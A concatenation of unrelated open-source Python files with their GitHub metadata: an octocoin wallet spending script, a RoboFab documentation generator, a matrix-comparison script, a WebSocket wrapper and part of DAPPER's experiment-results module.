total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to octocoind.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = octocoind.createrawtransaction(inputs, outputs)
signed_rawtx = octocoind.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(octocoind, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = octocoind.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(octocoind, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = octocoind.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(octocoind, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get bitcoins from")
parser.add_option("--to", dest="to", default=None,
help="address to get send bitcoins to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of octocoin.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
octocoind = connect_JSON(config)
if options.amount is None:
address_summary = list_available(octocoind)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(octocoind) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(octocoind, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(octocoind, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = octocoind.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
|
{
"content_hash": "6e6a7e277ea5078c3fbcc548fa56da6f",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 111,
"avg_line_length": 38.52777777777778,
"alnum_prop": 0.6168503450406839,
"repo_name": "my-first/octocoin",
"id": "8add3b5ccb3686e751fb5368fc9c82988a448ed6",
"size": "10089",
"binary": false,
"copies": "2",
"ref": "refs/heads/master-0.10",
"path": "contrib/spendfrom/spendfrom.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Assembly",
"bytes": "7639"
},
{
"name": "C",
"bytes": "343323"
},
{
"name": "C++",
"bytes": "3532257"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Groff",
"bytes": "18088"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2100"
},
{
"name": "M4",
"bytes": "144762"
},
{
"name": "Makefile",
"bytes": "83451"
},
{
"name": "Objective-C",
"bytes": "2023"
},
{
"name": "Objective-C++",
"bytes": "7240"
},
{
"name": "Protocol Buffer",
"bytes": "2309"
},
{
"name": "Python",
"bytes": "222283"
},
{
"name": "QMake",
"bytes": "2020"
},
{
"name": "Shell",
"bytes": "40592"
}
],
"symlink_target": ""
}
|
"""This script will generate up to date documentation for RoboFab.
Provided you have installed RoboFab correctly and you're using
python 2.1 or higher.
This script will make a bunch of HTML files in robofab/Documentation/robofabDoc/
It collects all docstrings, shows classes, methods and functions.
This script uses pydoc.
The results of this script depend on the environment you run it in
As RoboFab does different things in different places, you can't generate
documentation for (for instance) ObjectsFL when you're running
this script in the Python IDE: it's impossible to load all the necessary
modules.
Run this script in the Python IDE first, then run it again as a macro in FontLab,
that will give you a fairly complete set of descriptions.
"""
print 'Generating RoboFab documentation, just a moment...'
import robofab
import fontTools
import os
from pydoc import writedocs, ispackage, writedoc, inspect
from robofab.world import world
def myWritedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for file in os.listdir(dir):
path = os.path.join(dir, file)
if ispackage(path):
writedocs(path, pkgpath + file + '.', done)
elif os.path.isfile(path):
modname = inspect.getmodulename(path)
if modname:
if modname == '__init__':
modname = pkgpath[:-1] # remove trailing period
else:
modname = pkgpath + modname
if modname not in done:
done[modname] = 1
try:
writedoc(modname)
except:
print 'failed to document', modname
robofabDir = os.path.dirname(os.path.dirname(robofab.__file__))
fontToolsDir = os.path.dirname(os.path.dirname(fontTools.__file__))
roboFabDocoDir = ['Documentation', 'robofabDocs']
fontToolsDocoDir = ['Documentation', 'fontToolsDocs']
currentDir = os.getcwd()
# robofab
bits = robofabDir.split(os.sep)[:-1] + roboFabDocoDir
htmlDir = os.sep.join(bits)
try:
os.makedirs(htmlDir)
except OSError:
pass
os.chdir(htmlDir)
if world.inFontLab:
print "- generating documentation for FontLab specific modules"
print "- make sure to run this script in the IDE as well!"
# this is a list of FontLab specific modules that need to be documented
import robofab.objects.objectsFL
import robofab.tools.toolsFL
import robofab.pens.flPen
import robofab.tools.otFeatures
mods = [ robofab.objects.objectsFL,
robofab.tools.toolsFL,
robofab.pens.flPen,
robofab.tools.otFeatures,
]
for m in mods:
writedoc(m)
else:
print "- generating documentation for generic modules"
print "- make sure to run this script in FontLab as well (if you want that documented)."
myWritedocs(robofabDir)
os.chdir(currentDir)
# fonttools
bits = robofabDir.split(os.sep)[:-1] + fontToolsDocoDir
htmlDir = os.sep.join(bits)
try:
os.makedirs(htmlDir)
except OSError:
pass
os.chdir(htmlDir)
if world.inFontLab:
pass
else:
print "- generating documentation for generic modules"
print "- make sure to run this script in FontLab as well (if you want that documented)."
myWritedocs(fontToolsDir)
os.chdir(currentDir)
print 'done'
print 'The documentation is in', htmlDir
|
{
"content_hash": "8547e4d15842d0351f6bc439fe3b2696",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 89,
"avg_line_length": 28.151785714285715,
"alnum_prop": 0.7421503330161751,
"repo_name": "bitforks/robofab",
"id": "29ad3d38a26d6697319241d10ff7a02233cb73a3",
"size": "3191",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Documentation/makeDocumentation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "861010"
}
],
"symlink_target": ""
}
|
from numpy import linalg as LA
from numpy import genfromtxt
import numpy as np
from sys import argv
import string
import datetime
import os
import csv
import fnmatch
from math import ceil
import scipy.io as sio
# read in command line args
params = list(argv)
outputDir = params[1]
outputMatch = params[2]
compDir = params[3]
outputMatch2 = params[4]
print outputDir
print compDir
print outputMatch
# Generate Header List
headerList = list()
headerList.append(' ')
headerList.append('Total Count New')
headerList.append('Total Count Original')
headerList.append('Total Difference')
headerList.append('Total Absolute Difference')
headerList.append('Total Percent Difference')
print headerList
# Generate dir1 List
dir1 = list()
for root, dirnames, filenames in os.walk(outputDir):
for filename in fnmatch.filter(filenames, '*'+outputMatch):
mat1file = os.path.join(root,filename)
dir1.append(mat1file)
dir1 = sorted(dir1)
print dir1
# Generate dir2 List
dir2 = list()
for root, dirnames, filenames in os.walk(compDir):
for filename in fnmatch.filter(filenames, '*'+outputMatch2):
mat1file = os.path.join(root,filename)
dir2.append(mat1file)
dir2 = sorted(dir2)
print dir2
# Original Output Iterator
icompList = iter(dir2)
# Generate Label List
labelList = list()
for item in os.listdir(outputDir):
if os.path.isdir(os.path.join(outputDir,item)):
labelList.append(item)
labelList = sorted(labelList)
print labelList
# List Iterator
iLabelList = iter(labelList)
with open((outputDir+'analysis_compare'+datetime.datetime.now().strftime("%Y%m%dT%H%M%S")+'.csv'), 'wb') as csvfile:
rowwriter = csv.writer(csvfile, delimiter=',')
rowwriter.writerow(headerList)
for mat1file in dir1:
nextRow = list()
mat1file = sio.loadmat(mat1file)
mat1 = mat1file['fibergraph']
mat1 = mat1.todense()
#print mat1
mat2file = sio.loadmat(icompList.next())
mat2 = mat2file['fibergraph']
mat2 = mat2.todense()
#mat2 = genfromtxt(icompList.next(), delimiter=' ')
#mat2 = np.delete(mat2,0,1)
#mat2 = np.delete(mat2,0,0)
#mat2[np.isnan(mat2)]=0
#print mat2
# Print Out Results
nextRow.append(iLabelList.next())
matSumNew = mat1.sum()
nextRow.append(matSumNew)
matSumOld = mat2.sum()
nextRow.append(matSumOld)
matDiff = mat1.sum() - mat2.sum()
nextRow.append(matDiff)
matTotDiff = (np.absolute(mat1 - mat2)).sum()
nextRow.append(matTotDiff)
matTotPercDiff = (matSumNew - matSumOld)/((matSumNew + matSumOld)/2)
matTotPercDiff = (ceil(matTotPercDiff * 100000)/100000)*100
nextRow.append(matTotPercDiff)
rowwriter.writerow(nextRow)
print "VALIDATION COMPLETE"
|
{
"content_hash": "1828ecec8fb99e7577988b4998e3b364",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 116,
"avg_line_length": 23.300884955752213,
"alnum_prop": 0.7330041777440183,
"repo_name": "gkiar/MR-devtools",
"id": "d3775ff42cbaa6b668be805a1cf56299a0d6d81d",
"size": "3083",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "analysis/compare_mat.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Matlab",
"bytes": "2000"
},
{
"name": "Python",
"bytes": "26641"
}
],
"symlink_target": ""
}
|
import _thread as thread
from websocket import WebSocketApp
class WebSocketService():
def __init__( self, url, onMessage ):
def runWS( service ):
service._wsapp.run_forever()
self._wsapp = WebSocketApp( url, on_message=onMessage )
thread.start_new_thread( runWS, ( self, ) )
def stop( self ):
self._wsapp.close()
|
{
"content_hash": "6b2361eca5dffdae88084b2cca80dce9",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 63,
"avg_line_length": 26,
"alnum_prop": 0.5846153846153846,
"repo_name": "Eelco81/server-test-project",
"id": "1a0e8259227f4c3d16a3489f0cc422008e93e14f",
"size": "391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Test/lib/websocketservice.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "346824"
},
{
"name": "CSS",
"bytes": "116"
},
{
"name": "Gherkin",
"bytes": "7972"
},
{
"name": "HTML",
"bytes": "170"
},
{
"name": "JavaScript",
"bytes": "22080"
},
{
"name": "Makefile",
"bytes": "8760"
},
{
"name": "Python",
"bytes": "15678"
}
],
"symlink_target": ""
}
|
"""Tools (notably `xpSpace`) for processing and presenting experiment data."""
import collections
import copy
import warnings
import colorama
import numpy as np
from mpl_tools import place
from patlib.std import nonchalance
from struct_tools import AlignedDict, complement, intersect, transps
from tabulate import tabulate
from dapper.dpr_config import rc
from dapper.stats import align_col, unpack_uqs
from dapper.tools.colors import color_text, stripe
from dapper.tools.rounding import UncertainQtty
from dapper.tools.viz import NoneDict, default_styles
from dapper.xp_launch import xpList
class SparseSpace(dict):
"""Subclass of `dict` that enforces key conformity to a given `namedtuple`.
Like a normal `dict`, it can hold any type of objects.
But, since the keys must conform, they effectively follow a coordinate system,
so that the `dict` becomes a vector **space**. Example:
>>> dct = xpSpace(["x", "y", "z"])
>>> dct[(1, 2, 3)] = "pointA"
The coordinate system is specified by the `dims`:
a list of keys defining the `namedtuple` of `self.Coord`.
The above dict only has three `dims`, so this fails:
>>> dct[(1, 2, 3, 4)] = "pointB" # doctest: +NORMALIZE_WHITESPACE
Traceback (most recent call last):
...
TypeError: The key (1, 2, 3, 4) did not fit the coord. system
which has dims ('x', 'y', 'z')
Coordinates can contain any value, including `None`:
>>> dct[(1, 2, None)] = "pointB"
In intended usage, this space is highly sparse,
meaning there are many coordinates with no entry.
Indeed, as a data format for nd-arrays, it may be called
"coordinate list representation", used e.g. by `scipy.sparse.coo_matrix`.
Thus, operations across (potentially multiple) `dims`,
such as optimization or averaging, should be carried out by iterating
-- not over the `dims` -- but over the the list of items.
The most important method is `nest`,
which is used (by `xpSpace.table_tree`) to print and plot results.
This is essentially a "groupby" operation, and indeed the case could
be made that this class should be replaced by `pandas.DataFrame`.
The `__getitem__` is quite flexible, allowing accessing by:
- The actual key, a `self.Coord` object, or a standard tuple.<br>
Returns single item. Example:
>>> dct[1, 2, 3] == dct[(1, 2, 3)] == dct[dct.Coord(1, 2, 3)] == "pointA"
True
- A `slice` or `list`.<br>
Returns list.<br>
*PS: indexing by slice or list assumes that the dict is ordered,
which we inherit from the builtin `dict` since Python 3.7.
Moreover, it is a reflection of the fact that the internals of this class
work by looping over items.*
In addition, the `subspace` method (also aliased to `__call__`, and is implemented
via `coords_matching`) can be used to select items by the values of a *subset*
of their attributes. It returns a `SparseSpace`.
If there is only a single item it can be accessed as in `dct[()]`.
Inspired by
- https://stackoverflow.com/a/7728830
- https://stackoverflow.com/q/3387691
"""
@property
def dims(self):
return self.Coord._fields
def __init__(self, dims):
"""Usually initialized through `xpSpace.from_list`.
Parameters
----------
dims: list or tuple
The attributes defining the coordinate system.
"""
# Define coordinate system
self.Coord = collections.namedtuple('Coord', dims)
def repr2(c, keys=False, str_or_repr=repr):
if keys:
lst = [f"{k}={str_or_repr(v)}" for k, v in c._asdict().items()]
else:
lst = [str_or_repr(v) for v in c]
return "(" + ", ".join(lst) + ")"
self.Coord.repr2 = repr2
def update(self, items):
"""Update dict, using the custom `__setitem__` to ensure key conformity.
NB: the `kwargs` syntax is not supported because it only works for keys that
consist of (a single) string, which is not very interesting for SparseSpace.
"""
# See https://stackoverflow.com/a/2588648
# and https://stackoverflow.com/a/2390997
try:
items = items.items()
except AttributeError:
pass
for k, v in items:
self[k] = v
def __setitem__(self, key, val):
"""Setitem ensuring coordinate conforms."""
try:
key = self.Coord(*key)
except TypeError:
raise TypeError(
f"The key {key!r} did not fit the coord. system "
f"which has dims {self.dims}")
super().__setitem__(key, val)
def __getitem__(self, key):
"""Also allows list-indexing by `list` and `slice`."""
# List of items (from list of indices)
if isinstance(key, list):
lst = list(self.values())
return [lst[k] for k in key]
# List of items (from slice)
elif isinstance(key, slice):
return [*self.values()][key]
# Single item (by Coord object, or tuple)
else:
# NB: Dont't use isinstance(key, self.Coord)
# coz it fails when the namedtuple (Coord) has been
# instantiated in different places (but with equal params).
# Also see bugs.python.org/issue7796
return super().__getitem__(key)
def __call__(self, **kwargs):
"""Shortcut (syntactic sugar) for `SparseSpace.subspace`."""
return self.subspace(**kwargs)
def subspace(self, **kwargs):
"""Get an affine subspace.
NB: If you're calling this repeatedly (for all values of the same `kwargs`)
then you should consider using `SparseSpace.nest` instead.
Example
-------
xp_dict.subspace(da_method="EnKF", infl=1, seed=3)
"""
# Slow version
# outer = self.nest(outer_dims=list(kwargs)) # make subspaceS
# inner = outer[outer.Coord(**kwargs)] # discard all but 1
coords = self.coords_matching(**kwargs)
inner = self.__class__(complement(self.dims, kwargs))
for coord in coords:
inner[inner.coord_from_attrs(coord)] = self[coord]
return inner
def coords_matching(self, **kwargs):
"""Get all `coord`s matching kwargs.
Used by `SparseSpace.label_xSection` and `SparseSpace.subspace`. Unlike the
latter, this function returns a *list* of *keys* of the *original subspace*.
Note that the `missingval` shenanigans of `xpList.inds` are here unnecessary
since each coordinate is complete.
"""
def match(coord):
return all(getattr(coord, k) == kwargs[k] for k in kwargs)
return [c for c in self if match(c)]
def coord_from_attrs(self, obj):
"""Form a `coord` for this `xpSpace` by extracting attrs. from `obj`.
For instances of `self.Coord`, this is the identity opeartor, i.e.
self.coord_from_attrs(coord) == coord
"""
coord = (getattr(obj, a, None) for a in self.dims)
return self.Coord(*coord)
def __repr__(self):
txt = f"<{self.__class__.__name__}>"
txt += " with Coord/dims: "
try:
txt += "(and ticks): " + str(AlignedDict(self.ticks))
except AttributeError:
txt += str(self.dims) + "\n"
# Note: print(xpList(self)) produces a more human-readable table,
# but requires prep_table(), which we don't really want to call again
# (it's only called in from_list, not (necessarily) in any nested spaces)
L = 2
keys = [k.repr2() for k in self]
if 2*L < len(keys):
keys = keys[:L] + ["..."] + keys[-L:]
keys = "[\n " + ",\n ".join(keys) + "\n]"
return txt + f"populated by {len(self)} items with keys: {keys}"
def nest(self, inner_dims=None, outer_dims=None):
"""Project along `inner_acces` to yield a new `xpSpace` with dims `outer_dims`
The entries of this `xpSpace` are themselves `xpSpace`s, with dims `inner_dims`,
each one regrouping the entries with the same (projected) coordinate.
Note: this method could also be called `groupby`.
Note: this method is also called by `__getitem__(key)` if `key` is dict.
"""
# Default: a singleton outer space,
# with everything contained in the inner (projection) space.
if inner_dims is None and outer_dims is None:
outer_dims = ()
# Validate dims
if inner_dims is None:
assert outer_dims is not None
inner_dims = complement(self.dims, outer_dims)
else:
assert outer_dims is None
outer_dims = complement(self.dims, inner_dims)
# Fill spaces
outer_space = self.__class__(outer_dims)
for coord, entry in self.items():
# Lookup subspace coord
outer_coord = outer_space.coord_from_attrs(coord)
try:
# Get subspace
inner_space = outer_space[outer_coord]
except KeyError:
# Create subspace, embed
inner_space = self.__class__(inner_dims)
outer_space[outer_coord] = inner_space
# Add entry to subspace, similar to .fill()
inner_space[inner_space.coord_from_attrs(coord)] = entry
return outer_space
def intersect_dims(self, attrs):
"""Rm those `a` in `attrs` that are not in `self.dims`.
This enables sloppy `dims` allotment, for ease-of-use.
"""
absent = complement(attrs, self.dims)
if absent:
print(color_text("Warning:", colorama.Fore.RED),
"The requested attributes",
color_text(str(absent), colorama.Fore.RED),
("were not found among the xpSpace dims"
" (attrs. used as coordinates for the set of experiments)."
" This may be no prob. if the attrs are redundant for the coord-sys."
" However, if due to confusion or mis-spelling, then it is likely"
" to cause mis-interpretation of the shown results."))
attrs = complement(attrs, absent)
return attrs
def append_dim(self, dim):
"""Expand `self.Coord` by `dim`. For each item, insert `None` in new dim."""
self.__init__(self.dims+(dim,))
for coord in list(self):
entry = self.pop(coord)
self[coord + (None,)] = entry
def label_xSection(self, label, *NoneAttrs, **sub_coord):
"""Insert duplicate entries for the given cross-section.
Works by adding the attr. `xSection` to the dims of `SparseSpace`,
and setting it to `label` for entries matching `sub_coord`,
reflecting the "constance/constraint/fixation" this represents.
This distinguishes the entries in this fixed-affine subspace,
preventing them from being gobbled up by the operations of `nest`.
If you wish, you can specify the `NoneAttrs`,
which are consequently set to None for the duplicated entries,
preventing them from being shown in plot labels and tuning panels.
"""
if "xSect" not in self.dims:
self.append_dim('xSect')
for coord in self.coords_matching(**self.intersect_dims(sub_coord)):
entry = copy.deepcopy(self[coord])
coord = coord._replace(xSect=label)
coord = coord._replace(**{a: None for a in NoneAttrs})
self[coord] = entry
DIM_ROLES = dict(outer=None, inner=None, mean=None, optim=None)
class xpSpace(SparseSpace):
"""Functionality to facilitate working with `xps` and their results."""
@classmethod
def from_list(cls, xps, tick_ordering=None):
"""Init. from a list of objects, typically experiments referred to as `xp`s.
- Computes the relevant `dims` from the attributes, and
- Fills the dict by `xp`s.
- Computes and writes the attribute `ticks`.
This creates a `SparseSpace` of `xp`s. However, the nested subspaces generated
by `xpSpace.table_tree` (for printing and plotting) will hold objects of type
`UncertainQtty`, because it calls `mean` which calls `get_stat(statkey)`.
"""
# Define and fill SparseSpace
dct = xpList(xps).prep_table(nomerge=['xSect'])[0]
self = cls(dct.keys())
self.fill(xps)
self.make_ticks(dct, tick_ordering)
return self
def make_ticks(self, dct, ordering=None):
"""Unique & sort, for each individual "dim" in `dct`. Assign to `self.ticks`.
NB: `self.ticks` will not "propagate" through `SparseSpace.nest` or the like.
"""
self.ticks = dct
ordering = ordering or {}
for name, values in dct.items():
ticks = set(values) # unique (jumbles order)
order = ordering.get(name, 'as-found')
# Sort key
if callable(order):
key = order
elif 'as-found' in order:
key = values.index
else: # "natural"
def key(x):
return x
# Place None's at the end
def key_safe(x):
return (x is None), key(x)
# Sort
ticks = sorted(ticks, key=key_safe)
# Reverse
if isinstance(order, str) and "rev" in order:
ticks = ticks[::-1]
# Assign
dct[name] = ticks
def fill(self, xps):
"""Mass insertion."""
self.update([(self.coord_from_attrs(xp), xp) for xp in xps])
def squeeze(self):
"""Eliminate unnecessary dimensions."""
squeezed = xpSpace(xpList(self).prep_table()[0])
squeezed.fill(self)
return squeezed
def get_stat(self, statkey):
"""Make `xpSpace` with same `Coord` as `self`, but values `xp.avrgs.statkey`."""
# Init a new xpDict to hold stat
avrgs = self.__class__(self.dims)
not_found = set()
for coord, xp in self.items():
try:
avrgs[coord] = getattr(xp.avrgs, statkey)
except AttributeError:
not_found.add(coord)
if len(not_found) == len(self):
raise AttributeError(
f"The stat. '{statkey}' was not found among **any** of the xp's.")
elif not_found:
print(color_text("Warning:", "RED"), f"no stat. '{statkey}' found for")
print(*not_found, sep="\n")
return avrgs
def mean(self, dims=None):
"""Compute mean over `dims` (a list). Returns `xpSpace` without those `dims`."""
# Note: The case `dims=()` should work w/o special treatment.
if dims is None:
return self
nested = self.nest(dims)
for coord, space in nested.items():
def getval(uq):
return uq.val if isinstance(uq, UncertainQtty) else uq
vals = [getval(uq) for uq in space.values()]
# Don't use nanmean! It would give false impressions.
mu = np.mean(vals)
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
# Don't print warnings caused by N=1.
# It already correctly yield nan's.
var = np.var(vals, ddof=1)
N = len(vals)
uq = UncertainQtty(mu, np.sqrt(var/N))
uq.nTotal = N
uq.nFail = N - np.isfinite(vals).sum()
uq.nSuccess = N - uq.nFail
nested[coord] = uq
return nested
def tune(self, dims=None, costfun=None):
"""Get (compile/tabulate) a stat. optimised wrt. tuning params (`dims`)."""
# Define cost-function
costfun = (costfun or 'increasing').lower()
if 'increas' in costfun:
costfun = (lambda x: +x)
elif 'decreas' in costfun:
costfun = (lambda x: -x)
else:
assert callable(costfun) # custom
# Note: The case `dims=()` should work w/o special treatment.
if dims is None:
return self
nested = self.nest(dims)
for coord, space in nested.items():
# Find optimal value (and coord) within space
MIN = np.inf
found_any = False
for inner_coord, uq in space.items():
cost = costfun(uq.val)
if cost <= MIN:
found_any = True
MIN = cost
uq_opt = uq
uq_opt.tuned_coord = inner_coord
if not found_any:
uq_opt = uq # one is as good as another
nDim = range(len(space.Coord._fields))
uq_opt.tuned_coord = space.Coord(*(None for _ in nDim))
nested[coord] = uq_opt
return nested
def table_tree(self, statkey, dims, *, costfun=None):
"""Make hierarchy `outer > inner > mean > optim` using `SparseSpace.nest`.
The dimension passed to `nest` (at each level) is specified by `dims`.
The dimensions of `dims['mean']` and `dims['optim']` get eliminated
by the mean/tune operations. The `dims['outer']` and `dims['inner']
become the keys for the output hierarchy.
.. note::
cannot support multiple `statkey`s because it's not (obviously) meaningful
when optimizing over `dims['optim']`.
"""
def validate_dims(dims):
"""Validate dims."""
role_register = {}
new = {}
for role in set(dims) | set(DIM_ROLES):
assert role in DIM_ROLES, f"Invalid role {role!r}"
dd = dims.get(role, DIM_ROLES[role])
if dd is None:
# Don't convert None to (), allowing None to remain special.
pass
else:
# Ensure iterable
if isinstance(dd, str) or not hasattr(dd, "__iter__"):
dd = (dd,)
# Keep relevant only
dd = self.intersect_dims(dd)
# Ensure each dim plays a single-role
for dim in dd:
if dim in role_register:
raise TypeError(
f"A dim (here {dim!r}) cannot be assigned to 2"
f" roles (here {role!r} and {role_register[dim]!r}).")
else:
role_register[dim] = role
new[role] = dd
return new
def mean_tune(xp_dict):
"""Take mean, then tune.
Note: the `SparseSpace` implementation should be sufficiently
"uncluttered" that `mean_tune` (or a few of its code lines)
could be called anywhere above/between/below
the `nest`ing of `outer` or `inner`.
These possibile call locations are commented in the code.
"""
uq_dict = xp_dict.get_stat(statkey)
uq_dict = uq_dict.mean(dims['mean'])
uq_dict = uq_dict.tune(dims['optim'], costfun)
return uq_dict
dims = validate_dims(dims)
self2 = mean_tune(self)
# Prefer calling mean_tune() [also see its docstring]
# before doing outer/inner nesting. This is because then the dims of
# a row (xpSpace) should not include mean&optim, and thus:
# - Column header/coords may be had directly as row.keys(),
# without extraction by coord_from_attrs() from (e.g.) row[0].
# - Don't need to propagate mean&optim dims down to the row level.
# which would require defining rows by the nesting:
# rows = table.nest(outer_dims=complement(table.dims,
# *(dims['inner'] or ()),
# *(dims['mean'] or ()),
# *(dims['optim'] or ()) ))
# - Each level of the output from table_tree
# is a smaller (and more manageable) dict.
tables = self2.nest(outer_dims=dims['outer'])
for table_coord, table in tables.items():
# table = mean_tune(table)
# Should not be used (nesting as rows is more natural,
# and is required for getting distinct/row_keys).
# cols = table.nest(outer_dims=dims['inner'])
rows = table.nest(inner_dims=dims['inner'] or ())
# Overwrite table by its nesting as rows
tables[table_coord] = rows
# for row_coord, row in rows.items():
# rows[row_coord] = mean_tune(row)
args = dict(statkey=statkey, xp_dict=self, dims=dims)
tables.created_with = args
return dims, tables
def tickz(self, dim_name):
"""Dimension (axis) ticks without None"""
return [x for x in self.ticks[dim_name] if x is not None]
def print(self, statkey, dims, # noqa (shadowing builtin)
subcols=True, decimals=None, costfun=None,
squeeze_labels=True, colorize=True, title=None):
"""Print tables of results.
Parameters
----------
statkey: str
The statistic to extract from the `xp.avrgs` for each `xp`.
Examples: `"rmse.a"` (i.e. `"err.rms.a"`), `"rmse.ocean.a"`, `"duration"`.
dims: dict
Allots (maps) the dims of `xpSpace` to different roles in the tables.
- The "role" `outer` should list the dims/attributes
used to define the splitting of the results into *separate tables*:
one table for each distinct combination of attributes.
- Similarly , the role `inner` determines which attributes
split a table into its columns.
- `mean` lists the attributes over which the mean is taken
(for that row & column)
- `optim` lists the attributes used over which the optimum
is searched for (after taking the mean).
Example:
dict(outer='da_method', inner='N', mean='seed',
optim=('infl','loc_rad'))
Equivalently, use `mean=("seed",)`.
It is acceptible to leave this empty: `mean=()` or `mean=None`.
subcols: bool
If `True`, then subcolumns are added to indicate
- `1σ`: the confidence interval. If `mean=None` is used, this simply reports
the value `.prec` of the `statkey`, providing this is an `UncertainQtty`.
Otherwise, it is computed as `sqrt(var(xps)/N)`,
where `xps` is the set of statistic gathered over the `mean` dimensions.
- `*(optim)`: the optimal point (among all `optim` attributes),
as defined by `costfun`.
- `☠`: the number of failures (non-finite values) at that point.
- `✓`: the number of successes that go into the value
decimals: int
Number of decimals to print.
If `None`, this is determined for each statistic by its uncertainty.
costfun: str or function
Use `'increasing'` (default) or `'decreasing'` to indicate that the optimum
is defined as the lowest or highest value of the `statkey` found.
squeeze_labels: bool
Don't include redundant attributes in the line labels.
Caution: `get_style` will not be able to access the eliminated attrs.
colorize: bool
Add color to tables for readability.
"""
# Title
if title is not None:
if colorize:
clrs = colorama.Back.LIGHTBLUE_EX, colorama.Fore.BLACK
title = color_text(str(title), *clrs)
print(title)
# Inform dims["mean"]
if dims.get('mean', None):
print(f"Averages (in time and) over {dims['mean']}.")
else:
print("Averages in time only"
" (=> the 1σ estimates may be unreliable).")
def make_cols(rows, cc, subcols, h2):
"""Subcolumns: align, justify, join."""
# Define subcol formats
if subcols:
templ = "{val} ±{prec}"
templ += "" if dims['optim'] is None else " *{tuned_coord}"
templ += "" if dims['mean' ] is None else " {nFail} {nSuccess}"
aligns = dict(prec="<", tuned_coord="<")
def align(column, idx):
if idx == 0:
headers = dict(val=statkey, prec="1σ", tuned_coord=dims["optim"])
else:
headers = dict(val="", prec="1σ", tuned_coord="")
headers.update(nFail="☠", nSuccess="✓")
col = unpack_uqs(column, decimals)
if subcols:
for key in list(col):
if key in templ:
subcolmn = [headers.get(key, key)] + col[key]
col[key] = align_col(subcolmn, just=aligns.get(key, ">"))
else:
del col[key]
col = [templ.format(**row) for row in transps(col)]
else:
col = align_col([headers["val"]] + col["val"])
return col
def super_header(col_coord, idx, col):
header, matter = col[0], col[1:]
cc = col_coord.repr2(not idx, str).strip("()").replace(", ", ",")
cc = cc.center(len(header), "_") # +1 width for wide chars like ✔️
return [cc + "\n" + header] + matter
# Transpose
columns = [list(x) for x in zip(*rows)]
# Format column
for j, (col_coord, column) in enumerate(zip(cc, columns)):
col = align(column, j)
if h2:
col = super_header(col_coord, j, col)
columns[j] = col
# Un-transpose
rows = [list(x) for x in zip(*columns)]
return rows
dims, tables = self.table_tree(statkey, dims, costfun=costfun)
for table_coord, table in tables.items():
# Get table's column coords/ticks (cc).
# cc is really a set, but we use dict for ordering.
# cc = self.ticks[dims["inner"]] # may be > needed
# cc = table[0].keys() # may be < needed
cc = {c: None for row in table.values() for c in row}
